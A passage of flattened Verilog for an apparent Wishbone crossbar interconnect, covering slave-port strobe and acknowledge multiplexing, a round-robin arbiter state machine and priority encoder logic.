    always @ (  ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) or  ( ( ( m0_slv_sel == 4'd2 ) ) ? ( m0_stb_i ) : ( 1'b0 ) ) or  ( ( ( m1_slv_sel == 4'd2 ) ) ? ( m1_stb_i ) : ( 1'b0 ) ) or  ( ( ( m2_slv_sel == 4'd2 ) ) ? ( m2_stb_i ) : ( 1'b0 ) ) or  ( ( ( m3_slv_sel == 4'd2 ) ) ? ( m3_stb_i ) : ( 1'b0 ) ) or  ( ( ( m4_slv_sel == 4'd2 ) ) ? ( m4_stb_i ) : ( 1'b0 ) ) or  ( ( ( m5_slv_sel == 4'd2 ) ) ? ( m5_stb_i ) : ( 1'b0 ) ) or  ( ( ( m6_slv_sel == 4'd2 ) ) ? ( m6_stb_i ) : ( 1'b0 ) ) or  ( ( ( m7_slv_sel == 4'd2 ) ) ? ( m7_stb_i ) : ( 1'b0 ) ))
    begin
        case ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s2_wb_stb_o = ( ( ( m0_slv_sel == 4'd2 ) ) ? ( m0_stb_i ) : ( 1'b0 ) );
        end
        3'd1:
        begin
            s2_wb_stb_o = ( ( ( m1_slv_sel == 4'd2 ) ) ? ( m1_stb_i ) : ( 1'b0 ) );
        end
        3'd2:
        begin
            s2_wb_stb_o = ( ( ( m2_slv_sel == 4'd2 ) ) ? ( m2_stb_i ) : ( 1'b0 ) );
        end
        3'd3:
        begin
            s2_wb_stb_o = ( ( ( m3_slv_sel == 4'd2 ) ) ? ( m3_stb_i ) : ( 1'b0 ) );
        end
        3'd4:
        begin
            s2_wb_stb_o = ( ( ( m4_slv_sel == 4'd2 ) ) ? ( m4_stb_i ) : ( 1'b0 ) );
        end
        3'd5:
        begin
            s2_wb_stb_o = ( ( ( m5_slv_sel == 4'd2 ) ) ? ( m5_stb_i ) : ( 1'b0 ) );
        end
        3'd6:
        begin
            s2_wb_stb_o = ( ( ( m6_slv_sel == 4'd2 ) ) ? ( m6_stb_i ) : ( 1'b0 ) );
        end
        3'd7:
        begin
            s2_wb_stb_o = ( ( ( m7_slv_sel == 4'd2 ) ) ? ( m7_stb_i ) : ( 1'b0 ) );
        end
        endcase
    end
    assign s2_m0_ack_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s2_ack_i );
    assign s2_m1_ack_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s2_ack_i );
    assign s2_m2_ack_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s2_ack_i );
    assign s2_m3_ack_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s2_ack_i );
    assign s2_m4_ack_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s2_ack_i );
    assign s2_m5_ack_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s2_ack_i );
    assign s2_m6_ack_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s2_ack_i );
    assign s2_m7_ack_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s2_ack_i );
    assign s2_m0_err_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s2_err_i );
    assign s2_m1_err_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s2_err_i );
    assign s2_m2_err_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s2_err_i );
    assign s2_m3_err_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s2_err_i );
    assign s2_m4_err_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s2_err_i );
    assign s2_m5_err_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s2_err_i );
    assign s2_m6_err_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s2_err_i );
    assign s2_m7_err_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s2_err_i );
    assign s2_m0_rty_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s2_rty_i );
    assign s2_m1_rty_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s2_rty_i );
    assign s2_m2_rty_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s2_rty_i );
    assign s2_m3_rty_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s2_rty_i );
    assign s2_m4_rty_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s2_rty_i );
    assign s2_m5_rty_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s2_rty_i );
    assign s2_m6_rty_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s2_rty_i );
    assign s2_m7_rty_o = ( ( ( ( ( s2_pri_sel == 2'd0 ) ) ? ( s2_arb_state ) : ( ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( s2_msel_arb0_state ) : ( ( ( ( s2_msel_pri_sel == 2'd1 ) ) ? ( s2_msel_sel1 ) : ( s2_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s2_rty_i );
    assign s3_wb_data_i = s3_data_i;
    assign s3_data_o = s3_wb_data_o;
    assign s3_addr_o = s3_wb_addr_o;
    assign s3_sel_o = s3_wb_sel_o;
    assign s3_we_o = s3_wb_we_o;
    assign s3_cyc_o = s3_wb_cyc_o;
    assign s3_stb_o = s3_wb_stb_o;
    assign s3_wb_ack_i = s3_ack_i;
    assign s3_wb_err_i = s3_err_i;
    assign s3_wb_rty_i = s3_rty_i;
    always @ (  posedge clk_i)
    begin
        s3_next <=  ~( s3_wb_cyc_o);
    end
    assign s3_arb_req = { m7_s3_cyc_o, m6_s3_cyc_o, m5_s3_cyc_o, m4_s3_cyc_o, m3_s3_cyc_o, m2_s3_cyc_o, m1_s3_cyc_o, m0_s3_cyc_o };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s3_arb_state <= s3_arb_grant0;
        end
        else
        begin 
            s3_arb_state <= s3_arb_next_state;
        end
    end
    always @ (  s3_arb_state or  { m7_s3_cyc_o, m6_s3_cyc_o, m5_s3_cyc_o, m4_s3_cyc_o, m3_s3_cyc_o, m2_s3_cyc_o, m1_s3_cyc_o, m0_s3_cyc_o } or  1'b0)
    begin
        s3_arb_next_state = s3_arb_state;
        case ( s3_arb_state ) 
        s3_arb_grant0:
        begin
            if (  !( s3_arb_req[0]) | 1'b0 ) 
            begin
                if ( s3_arb_req[1] ) 
                begin
                    s3_arb_next_state = s3_arb_grant1;
                end
                else
                begin 
                    if ( s3_arb_req[2] ) 
                    begin
                        s3_arb_next_state = s3_arb_grant2;
                    end
                    else
                    begin 
                        if ( s3_arb_req[3] ) 
                        begin
                            s3_arb_next_state = s3_arb_grant3;
                        end
                        else
                        begin 
                            if ( s3_arb_req[4] ) 
                            begin
                                s3_arb_next_state = s3_arb_grant4;
                            end
                            else
                            begin 
                                if ( s3_arb_req[5] ) 
                                begin
                                    s3_arb_next_state = s3_arb_grant5;
                                end
                                else
                                begin 
                                    if ( s3_arb_req[6] ) 
                                    begin
                                        s3_arb_next_state = s3_arb_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s3_arb_req[7] ) 
                                        begin
                                            s3_arb_next_state = s3_arb_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_arb_grant1:
        begin
            if (  !( s3_arb_req[1]) | 1'b0 ) 
            begin
                if ( s3_arb_req[2] ) 
                begin
                    s3_arb_next_state = s3_arb_grant2;
                end
                else
                begin 
                    if ( s3_arb_req[3] ) 
                    begin
                        s3_arb_next_state = s3_arb_grant3;
                    end
                    else
                    begin 
                        if ( s3_arb_req[4] ) 
                        begin
                            s3_arb_next_state = s3_arb_grant4;
                        end
                        else
                        begin 
                            if ( s3_arb_req[5] ) 
                            begin
                                s3_arb_next_state = s3_arb_grant5;
                            end
                            else
                            begin 
                                if ( s3_arb_req[6] ) 
                                begin
                                    s3_arb_next_state = s3_arb_grant6;
                                end
                                else
                                begin 
                                    if ( s3_arb_req[7] ) 
                                    begin
                                        s3_arb_next_state = s3_arb_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s3_arb_req[0] ) 
                                        begin
                                            s3_arb_next_state = s3_arb_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_arb_grant2:
        begin
            if (  !( s3_arb_req[2]) | 1'b0 ) 
            begin
                if ( s3_arb_req[3] ) 
                begin
                    s3_arb_next_state = s3_arb_grant3;
                end
                else
                begin 
                    if ( s3_arb_req[4] ) 
                    begin
                        s3_arb_next_state = s3_arb_grant4;
                    end
                    else
                    begin 
                        if ( s3_arb_req[5] ) 
                        begin
                            s3_arb_next_state = s3_arb_grant5;
                        end
                        else
                        begin 
                            if ( s3_arb_req[6] ) 
                            begin
                                s3_arb_next_state = s3_arb_grant6;
                            end
                            else
                            begin 
                                if ( s3_arb_req[7] ) 
                                begin
                                    s3_arb_next_state = s3_arb_grant7;
                                end
                                else
                                begin 
                                    if ( s3_arb_req[0] ) 
                                    begin
                                        s3_arb_next_state = s3_arb_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s3_arb_req[1] ) 
                                        begin
                                            s3_arb_next_state = s3_arb_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_arb_grant3:
        begin
            if (  !( s3_arb_req[3]) | 1'b0 ) 
            begin
                if ( s3_arb_req[4] ) 
                begin
                    s3_arb_next_state = s3_arb_grant4;
                end
                else
                begin 
                    if ( s3_arb_req[5] ) 
                    begin
                        s3_arb_next_state = s3_arb_grant5;
                    end
                    else
                    begin 
                        if ( s3_arb_req[6] ) 
                        begin
                            s3_arb_next_state = s3_arb_grant6;
                        end
                        else
                        begin 
                            if ( s3_arb_req[7] ) 
                            begin
                                s3_arb_next_state = s3_arb_grant7;
                            end
                            else
                            begin 
                                if ( s3_arb_req[0] ) 
                                begin
                                    s3_arb_next_state = s3_arb_grant0;
                                end
                                else
                                begin 
                                    if ( s3_arb_req[1] ) 
                                    begin
                                        s3_arb_next_state = s3_arb_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s3_arb_req[2] ) 
                                        begin
                                            s3_arb_next_state = s3_arb_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_arb_grant4:
        begin
            if (  !( s3_arb_req[4]) | 1'b0 ) 
            begin
                if ( s3_arb_req[5] ) 
                begin
                    s3_arb_next_state = s3_arb_grant5;
                end
                else
                begin 
                    if ( s3_arb_req[6] ) 
                    begin
                        s3_arb_next_state = s3_arb_grant6;
                    end
                    else
                    begin 
                        if ( s3_arb_req[7] ) 
                        begin
                            s3_arb_next_state = s3_arb_grant7;
                        end
                        else
                        begin 
                            if ( s3_arb_req[0] ) 
                            begin
                                s3_arb_next_state = s3_arb_grant0;
                            end
                            else
                            begin 
                                if ( s3_arb_req[1] ) 
                                begin
                                    s3_arb_next_state = s3_arb_grant1;
                                end
                                else
                                begin 
                                    if ( s3_arb_req[2] ) 
                                    begin
                                        s3_arb_next_state = s3_arb_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s3_arb_req[3] ) 
                                        begin
                                            s3_arb_next_state = s3_arb_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_arb_grant5:
        begin
            if (  !( s3_arb_req[5]) | 1'b0 ) 
            begin
                if ( s3_arb_req[6] ) 
                begin
                    s3_arb_next_state = s3_arb_grant6;
                end
                else
                begin 
                    if ( s3_arb_req[7] ) 
                    begin
                        s3_arb_next_state = s3_arb_grant7;
                    end
                    else
                    begin 
                        if ( s3_arb_req[0] ) 
                        begin
                            s3_arb_next_state = s3_arb_grant0;
                        end
                        else
                        begin 
                            if ( s3_arb_req[1] ) 
                            begin
                                s3_arb_next_state = s3_arb_grant1;
                            end
                            else
                            begin 
                                if ( s3_arb_req[2] ) 
                                begin
                                    s3_arb_next_state = s3_arb_grant2;
                                end
                                else
                                begin 
                                    if ( s3_arb_req[3] ) 
                                    begin
                                        s3_arb_next_state = s3_arb_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s3_arb_req[4] ) 
                                        begin
                                            s3_arb_next_state = s3_arb_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_arb_grant6:
        begin
            if (  !( s3_arb_req[6]) | 1'b0 ) 
            begin
                if ( s3_arb_req[7] ) 
                begin
                    s3_arb_next_state = s3_arb_grant7;
                end
                else
                begin 
                    if ( s3_arb_req[0] ) 
                    begin
                        s3_arb_next_state = s3_arb_grant0;
                    end
                    else
                    begin 
                        if ( s3_arb_req[1] ) 
                        begin
                            s3_arb_next_state = s3_arb_grant1;
                        end
                        else
                        begin 
                            if ( s3_arb_req[2] ) 
                            begin
                                s3_arb_next_state = s3_arb_grant2;
                            end
                            else
                            begin 
                                if ( s3_arb_req[3] ) 
                                begin
                                    s3_arb_next_state = s3_arb_grant3;
                                end
                                else
                                begin 
                                    if ( s3_arb_req[4] ) 
                                    begin
                                        s3_arb_next_state = s3_arb_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s3_arb_req[5] ) 
                                        begin
                                            s3_arb_next_state = s3_arb_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_arb_grant7:
        begin
            if (  !( s3_arb_req[7]) | 1'b0 ) 
            begin
                if ( s3_arb_req[0] ) 
                begin
                    s3_arb_next_state = s3_arb_grant0;
                end
                else
                begin 
                    if ( s3_arb_req[1] ) 
                    begin
                        s3_arb_next_state = s3_arb_grant1;
                    end
                    else
                    begin 
                        if ( s3_arb_req[2] ) 
                        begin
                            s3_arb_next_state = s3_arb_grant2;
                        end
                        else
                        begin 
                            if ( s3_arb_req[3] ) 
                            begin
                                s3_arb_next_state = s3_arb_grant3;
                            end
                            else
                            begin 
                                if ( s3_arb_req[4] ) 
                                begin
                                    s3_arb_next_state = s3_arb_grant4;
                                end
                                else
                                begin 
                                    if ( s3_arb_req[5] ) 
                                    begin
                                        s3_arb_next_state = s3_arb_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s3_arb_req[6] ) 
                                        begin
                                            s3_arb_next_state = s3_arb_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s3_msel_req = { m7_s3_cyc_o, m6_s3_cyc_o, m5_s3_cyc_o, m4_s3_cyc_o, m3_s3_cyc_o, m2_s3_cyc_o, m1_s3_cyc_o, m0_s3_cyc_o };
    assign s3_msel_pri_enc_valid = { m7_s3_cyc_o, m6_s3_cyc_o, m5_s3_cyc_o, m4_s3_cyc_o, m3_s3_cyc_o, m2_s3_cyc_o, m1_s3_cyc_o, m0_s3_cyc_o };
    always @ (  s3_msel_pri_enc_valid[0] or  { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[1] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[0] ) ) })
    begin
        if (  !( s3_msel_pri_enc_valid[0]) ) 
        begin
            s3_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[1] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[0] ) ) } == 2'h0 ) 
            begin
                s3_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[1] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[0] ) ) } == 2'h1 ) 
                begin
                    s3_msel_pri_enc_pd0_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[1] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[0] ) ) } == 2'h2 ) 
                    begin
                        s3_msel_pri_enc_pd0_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s3_msel_pri_enc_pd0_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s3_msel_pri_enc_valid[0] or  { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[1] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[0] ) ) })
    begin
        if (  !( s3_msel_pri_enc_valid[0]) ) 
        begin
            s3_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[1] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[0] ) ) } == 2'h0 ) 
            begin
                s3_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s3_msel_pri_enc_pd0_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s3_msel_pri_enc_valid[1] or  { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[3] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[2] ) ) })
    begin
        if (  !( s3_msel_pri_enc_valid[1]) ) 
        begin
            s3_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[3] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[2] ) ) } == 2'h0 ) 
            begin
                s3_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[3] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[2] ) ) } == 2'h1 ) 
                begin
                    s3_msel_pri_enc_pd1_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[3] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[2] ) ) } == 2'h2 ) 
                    begin
                        s3_msel_pri_enc_pd1_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s3_msel_pri_enc_pd1_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s3_msel_pri_enc_valid[1] or  { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[3] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[2] ) ) })
    begin
        if (  !( s3_msel_pri_enc_valid[1]) ) 
        begin
            s3_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[3] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[2] ) ) } == 2'h0 ) 
            begin
                s3_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s3_msel_pri_enc_pd1_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s3_msel_pri_enc_valid[2] or  { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[5] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[4] ) ) })
    begin
        if (  !( s3_msel_pri_enc_valid[2]) ) 
        begin
            s3_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[5] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[4] ) ) } == 2'h0 ) 
            begin
                s3_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[5] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[4] ) ) } == 2'h1 ) 
                begin
                    s3_msel_pri_enc_pd2_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[5] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[4] ) ) } == 2'h2 ) 
                    begin
                        s3_msel_pri_enc_pd2_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s3_msel_pri_enc_pd2_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s3_msel_pri_enc_valid[2] or  { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[5] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[4] ) ) })
    begin
        if (  !( s3_msel_pri_enc_valid[2]) ) 
        begin
            s3_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[5] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[4] ) ) } == 2'h0 ) 
            begin
                s3_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s3_msel_pri_enc_pd2_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s3_msel_pri_enc_valid[3] or  { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[7] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[6] ) ) })
    begin
        if (  !( s3_msel_pri_enc_valid[3]) ) 
        begin
            s3_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
        end
        else
        begin 
